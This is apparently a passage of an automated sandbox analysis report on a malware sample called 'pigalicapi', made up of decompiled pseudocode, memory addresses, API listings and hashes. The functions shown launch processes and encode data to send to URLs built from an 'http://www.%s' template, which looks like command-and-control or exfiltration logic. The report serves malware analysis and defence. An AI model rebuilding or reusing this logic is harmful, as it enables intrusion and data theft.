                                                                                                                                                                                                                                                                          						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                          						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                                          						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x040078d6
                                                                                                                                                                                                                                                                          0x040078de
                                                                                                                                                                                                                                                                          0x040078f8
                                                                                                                                                                                                                                                                          0x0400790a
                                                                                                                                                                                                                                                                          0x04007922
                                                                                                                                                                                                                                                                          0x0400792d
                                                                                                                                                                                                                                                                          0x0400792e
                                                                                                                                                                                                                                                                          0x04007933
                                                                                                                                                                                                                                                                          0x0400795a
                                                                                                                                                                                                                                                                          0x04007960
                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                          0x0400796f

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s:%u
                                                                                                                                                                                                                                                                          • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                                          • Opcode ID: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                          • Instruction ID: 46ead0e7315176c8e7c3a96679b7c8ac73bfa04a13e8ca702a559205f2d732b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05115B71A04208ABEB08CF94C995BEDBBB4EB50308F04C29DE915BB280D379F645CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001E60(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                          					_v100.cb = 0x44;
                                                                                                                                                                                                                                                                          					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                                          						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                                          						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x04001e66
                                                                                                                                                                                                                                                                          0x04001e71
                                                                                                                                                                                                                                                                          0x04001e8b
                                                                                                                                                                                                                                                                          0x04001e93
                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                          0x04001ec2
                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                          0x04001ed4

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04001EB4
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04001EC2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                          • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                          • Opcode ID: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                          • Instruction ID: 8c18c5092416b0968d1e58d42d3dcefe862203e4accbbf984a8d418911b9581a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C011275A4420CABEB10DF90DD45FEE77B9AB04704F148119E6087B2C0D775AA45C7A1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 4004ba0-4004bbc CoInitialize 1 40056f0-40056fc CoUninitialize 0->1 2 4004bc2-4004bff call 4007b70 SetEvent 0->2 2->1 6 4004c05-4004c0e 2->6 7 4004c10-4004c21 WaitForSingleObject 6->7 8 4004c28-4004c84 VirtualAlloc * 3 6->8 7->8 9 4004c23 7->9 10 4004c8a-4004c8e 8->10 11 40056eb 8->11 9->1 10->11 12 4004c94-4004c98 10->12 11->1 12->11 13 4004c9e-4004cbd 12->13 15 40052a2-40052b2 13->15 16 4004cc3-4004cd0 13->16 17 40052b4-40052be 15->17 18 4005325-400534e call 4008370 15->18 19 4004cd6-4004ce3 16->19 20 400529d 16->20 17->18 21 40052c0-40052d1 17->21 35 4005354-400537f lstrlenA * 2 18->35 36 40056b8-40056e5 VirtualFree * 3 18->36 23 4004ce5-4004d17 call 4006170 * 2 call 40060c0 19->23 24 4004d1c-4004d29 19->24 21->18 27 40052d3-40052dd 21->27 23->20 25 4004d62-4004d6f 24->25 26 4004d2b-4004d5d call 4006170 * 2 call 40060c0 24->26 33 4004d71-4004da3 call 4006170 * 2 call 40060c0 25->33 34 4004da8-4004db5 25->34 26->20 27->18 32 40052df-4005322 call 4007b70 27->32 32->18 33->20 38 4004db7-4004dd8 GetCurrentThreadId call 4006170 34->38 39 4004e2c-4004e39 34->39 35->36 43 4005385-40053ca wsprintfA CryptBinaryToStringA 35->43 36->11 65 4004dda-4004dfb call 4006170 call 40060c0 38->65 66 4004dfd-4004e04 38->66 46 4004e72-4004e7f 39->46 47 4004e3b-4004e6d call 4006170 * 2 call 40060c0 39->47 43->36 44 40053d0-400544e MultiByteToWideChar call 40017d0 43->44 71 4005454-400545e 44->71 72 400569b-40056a2 44->72 57 4004ee1-4004eee 46->57 58 4004e81-4004eb4 GetSystemMetrics * 2 call 4006170 46->58 47->20 61 4004f40-4004f4d 57->61 62 4004ef0-4004f13 GlobalMemoryStatus call 4006170 57->62 81 4004eb9-4004edc call 4006170 call 40060c0 58->81 77 4004f86-4004f93 61->77 78 4004f4f-4004f81 call 4006170 * 2 call 40060c0 61->78 88 4004f18-4004f3b call 4006170 call 40060c0 62->88 80 4004e27 65->80 79 4004e06-4004e24 call 4006170 call 40060c0 66->79 66->80 86 4005470-4005477 71->86 87 4005460-400546a 71->87 72->36 83 40056a4-40056b2 VirtualFree 72->83 84 4004fd0-4004fdd 77->84 85 4004f95-4004fcb call 4006170 * 2 call 40060c0 77->85 78->20 79->80 80->20 81->20 83->36 100 4005032-400503f 84->100 101 4004fdf-400502d lstrlenA call 4006170 * 2 call 40060c0 84->101 85->20 95 400551f-4005526 86->95 96 400547d-40054af VirtualFree 86->96 87->86 87->95 88->20 95->72 105 400552c-4005540 EnterCriticalSection 95->105 110 40054c0-40054c7 96->110 107 4005041-4005091 lstrlenA call 4006170 * 2 call 40060c0 100->107 108 4005096-40050a3 100->108 101->20 118 4005542-4005573 VirtualAlloc call 4007b70 105->118 119 400558c-40055c1 VirtualAlloc 105->119 107->20 125 4005104-4005111 108->125 126 40050a5-40050ff lstrlenA call 4006170 * 2 call 40060c0 108->126 110->95 124 40054c9-40054f5 call 40017d0 110->124 142 4005578-4005587 118->142 133 40055c7-40055d8 GetTickCount 119->133 134 400568e-4005695 LeaveCriticalSection 119->134 150 40054fa-400550d 124->150 131 4005172-400517f 125->131 132 4005113-400516d lstrlenA call 4006170 * 2 call 40060c0 125->132 126->20 148 40051e0-40051ed 131->148 149 4005181-40051db lstrlenA call 4006170 * 2 call 40060c0 131->149 132->20 144 40055da-400561a call 4007b70 * 2 133->144 145 400561c-4005659 call 4007b70 * 2 133->145 134->72 142->134 191 400565c-400568b VirtualFree 144->191 145->191 154 400523f-400524c 148->154 155 40051ef-400523d lstrlenA call 4006170 * 2 call 40060c0 148->155 149->20 162 400551b 150->162 163 400550f-4005519 150->163 154->20 170 400524e-400529a call 4009b90 call 4006170 * 2 call 40060c0 154->170 155->20 162->95 163->162 173 400551d 163->173 170->20 173->110 191->134
                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                          			E04004BA0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                          				char* _v60;
                                                                                                                                                                                                                                                                          				CHAR* _v64;
                                                                                                                                                                                                                                                                          				intOrPtr* _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                                                          				void* _v80;
                                                                                                                                                                                                                                                                          				void* _v84;
                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                          				void* _v92;
                                                                                                                                                                                                                                                                          				void* _v96;
                                                                                                                                                                                                                                                                          				void* _v100;
                                                                                                                                                                                                                                                                          				void* _v124;
                                                                                                                                                                                                                                                                          				void* _v132;
                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                          				void* _v140;
                                                                                                                                                                                                                                                                          				void* _v144;
                                                                                                                                                                                                                                                                          				void* _v148;
                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                          				void* _v156;
                                                                                                                                                                                                                                                                          				void* _v160;
                                                                                                                                                                                                                                                                          				char _v420;
                                                                                                                                                                                                                                                                          				CHAR* _v424;
                                                                                                                                                                                                                                                                          				int _v428;
                                                                                                                                                                                                                                                                          				void* _v432;
                                                                                                                                                                                                                                                                          				long _v436;
                                                                                                                                                                                                                                                                          				short _v948;
                                                                                                                                                                                                                                                                          				void* _v952;
                                                                                                                                                                                                                                                                          				void* _v956;
                                                                                                                                                                                                                                                                          				void* _v960;
                                                                                                                                                                                                                                                                          				void* _v964;
                                                                                                                                                                                                                                                                          				long _v968;
                                                                                                                                                                                                                                                                          				void* _t306;
                                                                                                                                                                                                                                                                          				void* _t307;
                                                                                                                                                                                                                                                                          				void* _t308;
                                                                                                                                                                                                                                                                          				int _t312;
                                                                                                                                                                                                                                                                          				int _t318;
                                                                                                                                                                                                                                                                          				long _t328;
                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                          				void* _t351;
                                                                                                                                                                                                                                                                          				long _t358;
                                                                                                                                                                                                                                                                          				void* _t637;
                                                                                                                                                                                                                                                                          				void* _t638;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                          					L83:
                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					E04007B70( &_v36, _v8, 0x1c);
                                                                                                                                                                                                                                                                          					_t638 = _t637 + 0xc;
                                                                                                                                                                                                                                                                          					SetEvent( *(_v8 + 0x10));
                                                                                                                                                                                                                                                                          					_v40 = 0xea60;
                                                                                                                                                                                                                                                                          					_v44 = _v28;
                                                                                                                                                                                                                                                                          					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
                                                                                                                                                                                                                                                                          						_v64 = _v44 * 0x28 + _v36;
                                                                                                                                                                                                                                                                          						_v52 = 0x100000;
                                                                                                                                                                                                                                                                          						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v48 = _t306;
                                                                                                                                                                                                                                                                          						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v56 = _t307;
                                                                                                                                                                                                                                                                          						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v60 = _t308;
                                                                                                                                                                                                                                                                          						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
                                                                                                                                                                                                                                                                          							L82:
                                                                                                                                                                                                                                                                          							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v68 = _v48;
                                                                                                                                                                                                                                                                          							_v80 = 0;
                                                                                                                                                                                                                                                                          							while(_v80 < 0x100) {
                                                                                                                                                                                                                                                                          								_v80 = _v80 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
                                                                                                                                                                                                                                                                          								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                          								_v68 = _v68 + 4;
                                                                                                                                                                                                                                                                          								E04007B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                          								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                          							_t312 = E04008370(_v48, _v72, _v56, 0x100000); // executed
                                                                                                                                                                                                                                                                          							_t638 = _t638 + 0x10;
                                                                                                                                                                                                                                                                          							_v76 = _t312;
                                                                                                                                                                                                                                                                          							if(_v76 <= 0) {
                                                                                                                                                                                                                                                                          								L81:
                                                                                                                                                                                                                                                                          								VirtualFree(_v48, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								VirtualFree(_v56, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								VirtualFree(_v60, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								goto L82;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v424 = "http://www.%s";
                                                                                                                                                                                                                                                                          								_t318 = lstrlenA(_v64);
                                                                                                                                                                                                                                                                          								if(_t318 + lstrlenA(_v424) >= 0x100) {
                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								wsprintfA( &_v420, _v424, _v64);
                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                          								_v428 = 0x100000;
                                                                                                                                                                                                                                                                          								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v956 = 0;
                                                                                                                                                                                                                                                                          								_v432 = 0;
                                                                                                                                                                                                                                                                          								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
                                                                                                                                                                                                                                                                          								_v952 = 0;
                                                                                                                                                                                                                                                                          								_t328 = E040017D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                          								_v436 = _t328;
                                                                                                                                                                                                                                                                          								if(_v436 <= 0) {
                                                                                                                                                                                                                                                                          									L79:
                                                                                                                                                                                                                                                                          									if(_v956 != 0) {
                                                                                                                                                                                                                                                                          										VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v436 < 0x100 || _v952 >= 0x1f4) {
                                                                                                                                                                                                                                                                          									if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                          										goto L70;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          									_v956 = 0;
                                                                                                                                                                                                                                                                          									_v432 = 0;
                                                                                                                                                                                                                                                                          									_v960 = 0;
                                                                                                                                                                                                                                                                          									while(_v960 < 4) {
                                                                                                                                                                                                                                                                          										_t358 = E040017D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                          										_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                          										_v436 = _t358;
                                                                                                                                                                                                                                                                          										if(_v436 > 0x100 || _v952 < 0x1f4) {
                                                                                                                                                                                                                                                                          											goto L70;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											_v960 = _v960 + 1;
                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L70;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									L70:
                                                                                                                                                                                                                                                                          									if(_v436 > 0) {
                                                                                                                                                                                                                                                                          										EnterCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                          										if( *(_v12 + 4) != 0) {
                                                                                                                                                                                                                                                                          											_v968 =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                          											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          											_v964 = _t333;
                                                                                                                                                                                                                                                                          											if(_v964 != 0) {
                                                                                                                                                                                                                                                                          												if(GetTickCount() % 2 != 0) {
                                                                                                                                                                                                                                                                          													E04007B70(_v964, _v956, _v436);
                                                                                                                                                                                                                                                                          													E04007B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													E04007B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                          													E04007B70(_v964 +  *(_v12 + 8), _v956, _v436);
                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                          												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          												 *(_v12 + 4) = _v964;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          											 *(_v12 + 4) = _t351;
                                                                                                                                                                                                                                                                          											E04007B70( *(_v12 + 4), _v956, _v436);
                                                                                                                                                                                                                                                                          											_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                          											 *(_v12 + 8) = _v436;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										LeaveCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L79;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L83;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
























































                                                                                                                                                                                                                                                                          0x04004bac
                                                                                                                                                                                                                                                                          0x04004bb5
                                                                                                                                                                                                                                                                          0x04004bbc
                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                          0x040056fc
                                                                                                                                                                                                                                                                          0x04004bc2
                                                                                                                                                                                                                                                                          0x04004bcc
                                                                                                                                                                                                                                                                          0x04004bd1
                                                                                                                                                                                                                                                                          0x04004bdb
                                                                                                                                                                                                                                                                          0x04004be1
                                                                                                                                                                                                                                                                          0x04004beb
                                                                                                                                                                                                                                                                          0x04004bf9
                                                                                                                                                                                                                                                                          0x04004c31
                                                                                                                                                                                                                                                                          0x04004c34
                                                                                                                                                                                                                                                                          0x04004c49
                                                                                                                                                                                                                                                                          0x04004c4f
                                                                                                                                                                                                                                                                          0x04004c60
                                                                                                                                                                                                                                                                          0x04004c66
                                                                                                                                                                                                                                                                          0x04004c77
                                                                                                                                                                                                                                                                          0x04004c7d
                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                          0x040056eb
                                                                                                                                                                                                                                                                          0x04004bf6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004c9e
                                                                                                                                                                                                                                                                          0x04004ca1
                                                                                                                                                                                                                                                                          0x04004ca4
                                                                                                                                                                                                                                                                          0x04004cb6
                                                                                                                                                                                                                                                                          0x04004cb3
                                                                                                                                                                                                                                                                          0x04004cb3
                                                                                                                                                                                                                                                                          0x040052a8
                                                                                                                                                                                                                                                                          0x040052b2
                                                                                                                                                                                                                                                                          0x040052eb
                                                                                                                                                                                                                                                                          0x040052f3
                                                                                                                                                                                                                                                                          0x0400530e
                                                                                                                                                                                                                                                                          0x04005313
                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                          0x04005322
                                                                                                                                                                                                                                                                          0x0400532b
                                                                                                                                                                                                                                                                          0x0400533f
                                                                                                                                                                                                                                                                          0x04005344
                                                                                                                                                                                                                                                                          0x04005347
                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                          0x040056b8
                                                                                                                                                                                                                                                                          0x040056c3
                                                                                                                                                                                                                                                                          0x040056d4
                                                                                                                                                                                                                                                                          0x040056e5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                          0x04005354
                                                                                                                                                                                                                                                                          0x04005362
                                                                                                                                                                                                                                                                          0x0400537f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005397
                                                                                                                                                                                                                                                                          0x0400539d
                                                                                                                                                                                                                                                                          0x040053a0
                                                                                                                                                                                                                                                                          0x040053ca
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040053d0
                                                                                                                                                                                                                                                                          0x040053da
                                                                                                                                                                                                                                                                          0x040053fd
                                                                                                                                                                                                                                                                          0x04005403
                                                                                                                                                                                                                                                                          0x04005439
                                                                                                                                                                                                                                                                          0x0400543e
                                                                                                                                                                                                                                                                          0x04005441
                                                                                                                                                                                                                                                                          0x0400544e
                                                                                                                                                                                                                                                                          0x0400569b
                                                                                                                                                                                                                                                                          0x040056a2
                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                          0x040056b2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040056a2
                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                          0x04005477
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400548b
                                                                                                                                                                                                                                                                          0x04005491
                                                                                                                                                                                                                                                                          0x0400549b
                                                                                                                                                                                                                                                                          0x040054a5
                                                                                                                                                                                                                                                                          0x040054c0
                                                                                                                                                                                                                                                                          0x040054f5
                                                                                                                                                                                                                                                                          0x040054fa
                                                                                                                                                                                                                                                                          0x040054fd
                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400551d
                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040054ba
                                                                                                                                                                                                                                                                          0x0400550d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                          0x0400551f
                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                          0x04005533
                                                                                                                                                                                                                                                                          0x04005540
                                                                                                                                                                                                                                                                          0x04005598
                                                                                                                                                                                                                                                                          0x040055ae
                                                                                                                                                                                                                                                                          0x040055b4
                                                                                                                                                                                                                                                                          0x040055c1
                                                                                                                                                                                                                                                                          0x040055d8
                                                                                                                                                                                                                                                                          0x04005631
                                                                                                                                                                                                                                                                          0x04005654
                                                                                                                                                                                                                                                                          0x04005659
                                                                                                                                                                                                                                                                          0x040055da
                                                                                                                                                                                                                                                                          0x040055ef
                                                                                                                                                                                                                                                                          0x04005612
                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                          0x04005617
                                                                                                                                                                                                                                                                          0x0400566b
                                                                                                                                                                                                                                                                          0x0400567c
                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                          0x0400568b
                                                                                                                                                                                                                                                                          0x04005542
                                                                                                                                                                                                                                                                          0x04005552
                                                                                                                                                                                                                                                                          0x0400555b
                                                                                                                                                                                                                                                                          0x04005573
                                                                                                                                                                                                                                                                          0x04005578
                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                          0x04005584
                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                          0x04005695
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04005526
                                                                                                                                                                                                                                                                          0x0400545e
                                                                                                                                                                                                                                                                          0x0400534e
                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004bf9

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004BAC
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004BDB
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 04004C19
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C49
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C60
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C77
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040056F0
